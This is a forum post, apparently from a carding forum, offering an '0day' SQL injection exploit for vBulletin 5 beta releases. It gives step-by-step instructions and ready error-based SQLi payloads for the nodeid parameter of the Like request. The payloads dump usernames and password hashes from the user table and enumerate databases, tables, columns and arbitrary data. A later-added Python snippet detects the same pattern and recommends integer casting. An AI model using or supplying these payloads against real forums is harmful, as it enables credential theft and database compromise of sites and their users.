vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day



CardingMafia Admin
04-04-2013, 10:37 AM
#Title: vBulletin 5 SQL Injection > Beta Whatever
#Author: 0x0A
#Date: Dec 11, 2012
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: Buy vBulletin 5 Connect
vBulletin Forum Features
***********.com
#Version: 5 and above(not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Demo sites to try: Forums - Forums
http://vb5connect.com/bb/
******************************************************************



-------------------------------------------------------------------
-------------------------------------------------------------------
How to
-------------------------------------------------------------------
-------------------------------------------------------------------


-------------------------------------------------------------------
===================================================================
-------------------------------------------------------------------
[#1] First of all, make an account on the vBulletin 5 forum,

http://img402.imageshack.us/img402/7784/69376730.png
-------------------------------------------------------------------
===================================================================
-------------------------------------------------------------------



-------------------------------------------------------------------
===================================================================
-------------------------------------------------------------------
[#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)

http://imageshack.us/a/img12/305/89268702.png
-------------------------------------------------------------------
===================================================================
-------------------------------------------------------------------


-------------------------------------------------------------------
===================================================================
-------------------------------------------------------------------
[#3] After that, click the Like button; you will receive almost the same result as me. Go to the first POST record, as in the picture below, and click the Replay button,

http://imageshack.us/a/img707/9990/68621087.png
-------------------------------------------------------------------
===================================================================
-------------------------------------------------------------------


-------------------------------------------------------------------
===================================================================
-------------------------------------------------------------------
[#4] Then, on Send POST Content use this:

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://imageshack.us/a/img42/1590/26447606.png


//Note: keep the nodeid value as it was by default in the POST Content. Otherwise you'll get an invalid nodeid error.
The following SQLi command will fetch out the first record from the user table (username/password).
-------------------------------------------------------------------
===================================================================
-------------------------------------------------------------------




-------------------------------------------------------------------
===================================================================
-------------------------------------------------------------------
[#Other SQLi Syntaxes]

+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Version():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|User():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Database():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+


+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Database Print:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Table Count:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Print Tables:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Columns of selected table:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Fetch Out Data:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+

-------------------------------------------------------------------
===================================================================
-------------------------------------------------------------------
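
For defenders, an added example that is not part of the original post: a Python check that treats nodeid as a strict integer and flags the error-based pattern shared by every string above (a subselect grouping information_schema rows by floor(rand(0)*2)). The function names, the digit-only rule for nodeid and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Markers of the error-based technique shared by every payload in the post:
# a subselect grouping information_schema rows by floor(rand(0)*2).
SIGNATURES = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "info_schema": re.compile(r"information_schema", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}
STRICT_INT = re.compile(r"[0-9]{1,10}")  # assumed legitimate shape of nodeid

# Constructed sample POST bodies; the last is the Version() string quoted above.
SAMPLES = [
    "nodeid=70",
    "nodeid=70abc",
    "nodeid=70) and(select 1 from(select count(*),concat((select (select "
    "concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from "
    "information_schema.tables limit 0,1),floor(rand(0)*2))x from "
    "information_schema.tables group by x)a) AND (1338=1338",
]


def inspect_body(body, param="nodeid"):
    """Decode one urlencoded POST body and classify the value of `param`."""
    fields = dict(parse_qsl(body, keep_blank_values=True))
    value = fields.get(param)
    if value is None:
        return {"valid": True, "hits": [], "verdict": "no-param"}
    valid = STRICT_INT.fullmatch(value) is not None
    hits = sorted(n for n, rx in SIGNATURES.items() if rx.search(value))
    if valid:
        verdict = "ok"
    elif len(hits) >= 2:
        verdict = "sqli-error-based"
    else:
        verdict = "reject-non-integer"
    return {"valid": valid, "hits": hits, "verdict": verdict}


def scan(bodies):
    """Return (verdict, hits) for each body, in order."""
    return [(r["verdict"], r["hits"]) for r in map(inspect_body, bodies)]


if __name__ == "__main__":
    for body, (verdict, hits) in zip(SAMPLES, scan(SAMPLES)):
        print(f"{verdict:20} {hits} {body[:40]}")
```

A check like this belongs in log review or a request filter; the fix in the application itself is to cast nodeid to an integer or bind it as a query parameter.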
